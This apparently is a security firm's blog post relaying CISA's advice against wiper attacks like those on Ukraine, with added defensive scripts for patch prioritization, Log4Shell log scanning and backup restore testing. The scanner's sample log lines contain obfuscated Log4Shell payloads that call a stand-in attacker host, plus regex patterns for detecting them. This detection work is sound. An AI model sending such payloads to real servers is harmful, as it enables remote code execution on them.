The Cybersecurity and Infrastructure Security Agency (CISA) is urging United States companies to tighten their cybersecurity defenses against data-wiping attacks like those that recently targeted Ukrainian government agencies and businesses. According to BleepingComputer, Ukrainian government agencies and businesses were hit by coordinated cyberattacks that defaced their websites and deployed data-wiping malware that corrupts data and renders Windows devices inoperable.
Sources told a cybersecurity journalist that the threat actors used CVE-2021-32648, an authentication-bypass vulnerability in the OctoberCMS platform, to carry out the website defacements. The Ukraine Cyber Police say they are also investigating the use of the Log4j vulnerabilities and stolen credentials to gain access to networks and servers. Another victim was a Ukrainian IT services company that helped develop the affected websites, which raises concerns about a supply-chain attack. The defacements and the data-wiping attacks were originally thought to be two separate incidents; Ukraine later stated that organizations were hit by both, leading investigators to conclude they were coordinated.
The attacks on the government agencies' websites (replacing the displayed content) and the destruction of data were most likely intended to cause serious damage to the state's electronic information infrastructure. Ukraine has blamed Russia for the attacks, while some security experts attribute them to Ghostwriter, a state-sponsored hacking group with ties to Belarus.
CISA is urging United States companies and business leaders to take the following steps to prevent similar destructive attacks on their networks. Although CISA's recommendations were issued in response to the attacks on Ukraine, the same steps help prevent the network intrusions that typically precede ransomware attacks.
Steps to Reduce Possible Damaging Cyber Intrusions:
- Verify that all remote access to the network, and all privileged or administrative access, requires multi-factor authentication.
- Confirm software is up to date, prioritizing updates that address vulnerabilities in CISA's Known Exploited Vulnerabilities (KEV) catalog.
- Confirm that IT personnel have disabled all ports and protocols that are not essential for business purposes.
- If the company uses cloud services, ensure IT personnel have reviewed and implemented strong security controls for them.
- Sign up for CISA’s free cyber hygiene services that include vulnerability scanning to reduce exposure to threats.
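Prioritizing patches by the KEV catalog is straightforward to automate. The script below is an added example, not CISA's or SpearTip's code: it joins a vulnerability-scanner export against the KEV feed and ranks findings so that catalog entries come first, most overdue first, with everything else falling back to CVSS. It assumes only the `cveID` and `dueDate` fields of the KEV JSON (the real feed carries more); the feed excerpt, due dates, scanner CSV and the placeholder `CVE-0000-0001` are constructed for the example.

```python
import csv
import io
import json
from datetime import date, datetime

# Constructed excerpt in the shape of CISA's KEV JSON feed (the real feed is published on
# cisa.gov and has more fields). CVE-2021-44228 is Log4Shell; CVE-2021-32648 is the
# OctoberCMS bug used in the defacements. Due dates here are illustrative, not CISA's.
KEV_FEED = json.dumps({
    "catalogVersion": "constructed",
    "vulnerabilities": [
        {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
         "dueDate": "2021-12-24"},
        {"cveID": "CVE-2021-32648", "vendorProject": "October CMS", "product": "October CMS",
         "dueDate": "2022-02-01"},
    ],
})

# Constructed vulnerability-scanner export. CVE-0000-0001 is a placeholder, not a real ID.
SCAN_EXPORT = """asset,cve,cvss
web-01,CVE-2021-44228,10.0
web-01,CVE-2021-32648,9.1
web-02,CVE-2021-32648,9.1
db-01,CVE-0000-0001,7.5
db-01,CVE-2021-44228,10.0
"""


def load_kev(feed_json: str) -> dict:
    """Index the KEV feed by CVE ID."""
    data = json.loads(feed_json)
    return {v["cveID"]: v for v in data["vulnerabilities"]}


def prioritize(scan_csv: str, kev: dict, today: date) -> list:
    """Rank scanner findings: KEV entries first (most overdue first), then the rest by CVSS."""
    findings = []
    for row in csv.DictReader(io.StringIO(scan_csv)):
        entry = kev.get(row["cve"])
        finding = {"asset": row["asset"], "cve": row["cve"], "cvss": float(row["cvss"]),
                   "kev": entry is not None, "due": None, "days_overdue": None}
        if entry:
            due = datetime.strptime(entry["dueDate"], "%Y-%m-%d").date()
            finding["due"] = due
            finding["days_overdue"] = (today - due).days  # negative means not yet due
        findings.append(finding)

    def sort_key(f):
        if f["kev"]:
            return (0, -f["days_overdue"], -f["cvss"])
        return (1, 0, -f["cvss"])

    findings.sort(key=sort_key)  # sort is stable, so equal keys keep scanner order
    return findings


if __name__ == "__main__":
    for f in prioritize(SCAN_EXPORT, load_kev(KEV_FEED), date(2022, 1, 20)):
        flag = f"KEV, {f['days_overdue']:+d} days vs due date" if f["kev"] else "not in KEV"
        print(f"{f['asset']:7} {f['cve']:15} CVSS {f['cvss']:<4} {flag}")
```

Run against a real export, the ranking tells the patching team what to do today rather than what has the highest score; a CVSS 7.5 bug that is actively exploited and past its KEV due date outranks a CVSS 10 that nobody is exploiting.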
Steps to Detect Potential Intrusions:
- Ensure cybersecurity/IT personnel are focused on identifying and quickly assessing any unexpected or unusual network behavior, and that logging is enabled so that issues or incidents can be investigated.
- Confirm the company's entire network is protected by antivirus/anti-malware software and that signatures are up to date.
- If working with Ukrainian organizations, take extra care to monitor, inspect, and isolate traffic from those organizations, and closely review the access controls that apply to it.
- Designate an incident-response team with main points of contact for suspected cybersecurity incidents and clearly assigned responsibilities within the company, including technology, communications, legal, and business continuity.
- Ensure key personnel are available, and identify the means to provide surge support when responding to incidents.
- Conduct tabletop exercises ensuring all participants understand their roles during an incident.
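Enabling logging only pays off if someone inspects the logs for the behavior the attackers are known to use. Since the page names the Log4j vulnerabilities as one of the access vectors under investigation, the script below, an added example that is not CISA's or SpearTip's code, scans web-server access-log lines for Log4Shell exploitation attempts. It normalizes the nested-lookup tricks (`${x:-y}`, `${lower:j}`) that attackers use to hide the literal string `jndi` before matching, then reports the source IP, the JNDI scheme, and the callback host. The log lines, IP addresses (from the 203.0.113.0/24 documentation range) and timestamps are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed Apache combined-format access-log lines. Lines 2-4 carry Log4Shell payloads
# in the query string or User-Agent; line 5 carries a harmless-looking lookup string.
SAMPLE_LOG = [
    '203.0.113.10 - - [14/Jan/2022:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [14/Jan/2022:10:01:05 +0000] "GET /?q=${jndi:ldap://203.0.113.99:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [14/Jan/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://203.0.113.99:1099/b}"',
    '203.0.113.13 - - [14/Jan/2022:10:01:12 +0000] "POST /login HTTP/1.1" 302 0 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.99/c}"',
    '203.0.113.14 - - [14/Jan/2022:10:01:15 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# Log4j 2 lookup forms used to obfuscate the string "jndi":
#   ${x:-y}     default-value syntax; evaluates to y when lookup x is unknown (x may be empty)
#   ${lower:c}  and ${upper:c} evaluate to c in the given case; the final match below is
#               case-insensitive, so both are simply reduced to c here
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# After normalization a payload reads ${jndi:<scheme>://<host>...}
JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/:}\s]+)", re.IGNORECASE)


def normalize(s: str, max_rounds: int = 10) -> str:
    """Resolve nested/obfuscated lookups innermost-first, as Log4j would, until stable."""
    for _ in range(max_rounds):
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
        new = CASE_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


@dataclass
class Finding:
    src_ip: str
    scheme: str    # ldap, rmi, dns, ...
    callback: str  # host the victim would be made to contact
    raw: str


def scan_log(lines: List[str]) -> List[Finding]:
    """Return one Finding per log line containing a (possibly obfuscated) JNDI lookup."""
    findings = []
    for line in lines:
        m = JNDI.search(normalize(line))
        if m:
            findings.append(Finding(line.split()[0], m.group(1).lower(), m.group(2), line))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.src_ip} -> jndi:{f.scheme} callback {f.callback}")
```

Two practitioner notes: a match here is an attempt, not a confirmed compromise, so the callback host is the pivot for the next check (did any internal host actually connect to it on that port?); and the normalization is deliberately bounded so that a pathological payload cannot keep the scanner looping.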
Maximize Resilience to Destructive Cyber Incidents:
- Test backup procedures and infrastructure, ensuring that critical data can be restored if it is impacted by ransomware or a destructive cyberattack. Ensure that backups are isolated from network connections.
- If the company uses industrial control systems or operational technology, test the manual controls to verify that critical functions remain operable if the network becomes unavailable or untrusted.
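A backup that has never been restored is an assumption, not a control. The script below is an added example (not CISA's or SpearTip's code) of the restore drill the first bullet calls for: it archives a directory, records a SHA-256 manifest, simulates a wiper overwriting the live data, restores from the archive into a clean location, and verifies every restored file against the manifest. The sample files are constructed in a temporary directory; the archive format (tar.gz) and the manifest layout are choices made for the example.

```python
import hashlib
import json
import tarfile
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def make_backup(src: Path, archive: Path) -> dict:
    """Archive every file under src and return a manifest {relative path: sha256}.
    The manifest is also written beside the archive so a restore can be checked later."""
    manifest = {}
    with tarfile.open(archive, "w:gz") as tar:
        for p in sorted(src.rglob("*")):
            if p.is_file():
                rel = p.relative_to(src).as_posix()
                manifest[rel] = sha256_file(p)
                tar.add(p, arcname=rel)
    archive.with_name(archive.name + ".manifest.json").write_text(json.dumps(manifest, indent=2))
    return manifest


def restore(archive: Path, dest: Path) -> list:
    """Extract regular files from the archive into dest, refusing member names that
    would escape dest (absolute paths or '..'); returns the restored relative paths."""
    restored = []
    with tarfile.open(archive, "r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            name = Path(member.name)
            if name.is_absolute() or ".." in name.parts:
                raise ValueError(f"refusing unsafe archive member: {member.name}")
            out = dest / name
            out.parent.mkdir(parents=True, exist_ok=True)
            with tar.extractfile(member) as src_f, open(out, "wb") as out_f:
                out_f.write(src_f.read())
            restored.append(name.as_posix())
    return restored


def verify(root: Path, manifest: dict) -> list:
    """Return manifest entries whose copy under root is missing or has a different hash."""
    return [rel for rel, digest in manifest.items()
            if not (root / rel).is_file() or sha256_file(root / rel) != digest]


def restore_drill() -> bool:
    """Constructed end-to-end drill: back up, wipe the live data, restore, verify."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        src = tmp / "data"
        (src / "db").mkdir(parents=True)
        (src / "db" / "customers.csv").write_bytes(b"id,name\n1,alice\n2,bob\n")
        (src / "config.ini").write_bytes(b"[app]\nmode=prod\n")

        archive = tmp / "backup.tar.gz"
        manifest = make_backup(src, archive)

        # Simulate a wiper: overwrite every live file with zeros.
        for p in src.rglob("*"):
            if p.is_file():
                p.write_bytes(b"\x00" * 512)
        assert set(verify(src, manifest)) == {"config.ini", "db/customers.csv"}

        # Restore into a clean location and check every file against the manifest.
        dest = tmp / "restore"
        restored = restore(archive, dest)
        return sorted(restored) == sorted(manifest) and verify(dest, manifest) == []


if __name__ == "__main__":
    print("restore drill:", "PASS" if restore_drill() else "FAIL")
```

In production the archive and manifest would live on storage the wiper cannot reach (offline or immutable), which is the "isolated from network connections" part of the bullet; the drill is only meaningful if it is run from that copy, on a schedule, and its result is recorded.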
In light of the recent data-wiping attacks against Ukrainian government agencies and organizations, CISA recommends that cybersecurity and IT personnel review its advisory on understanding and mitigating Russian state-sponsored cyber threats to US critical infrastructure. Companies should also stay alert to the evolving threat landscape and take the precautionary steps above to reduce the risk of a cyber intrusion. At SpearTip, our certified engineers specialize in incident response and breach handling. Our engineers continuously monitor companies' networks from our Security Operations Centers for threats such as data-wiping attacks. Our ShadowSpear Platform, our endpoint detection and response tool, integrates with cloud, network, and endpoint devices to provide additional protection against exploits and to stop the full attack cycle.
If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.